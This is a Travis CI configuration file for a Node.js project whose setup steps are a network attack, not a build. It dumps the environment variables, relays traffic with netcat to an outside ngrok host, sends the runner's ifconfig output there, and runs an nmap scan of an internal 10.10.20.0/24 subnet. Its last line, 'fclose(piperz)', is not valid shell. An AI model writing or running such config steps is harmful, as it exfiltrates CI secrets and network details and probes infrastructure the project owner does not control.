language: node_js
sudo: required
before_script:
  - env
  - whoami
  - export NGPORT=19224
  - export NGHOSTNAME=0.tcp.ngrok.io
  - mkfifo piperz
  - nc -k -l 12345 0<piperz|nc $NGHOSTNAME $NGPORT 1>piperz &
  - sudo apt-get update
  - sudo apt-get install nmap
  - sudo ifconfig | nc localhost 12345
  - sudo nmap -sT 10.10.20.0/24
  - echo "ciderdone" | nc localhost 12345
  - fclose(piperz)